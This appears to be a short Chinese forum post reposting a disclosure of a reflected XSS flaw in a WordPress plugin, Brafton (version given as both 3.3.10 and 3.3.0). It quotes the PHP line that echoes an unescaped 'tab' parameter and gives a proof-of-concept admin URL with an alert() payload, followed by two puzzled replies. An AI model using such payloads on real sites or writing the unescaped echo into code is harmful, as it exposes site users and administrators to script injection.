WordPress Brafton 3.3.10 xss漏洞
WordPress Brafton plugin version 3.3.0DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php
in line 11 :
tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo
0;}?>;
wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) 什么东西?:funk:
我什么都没看到
页:
[1]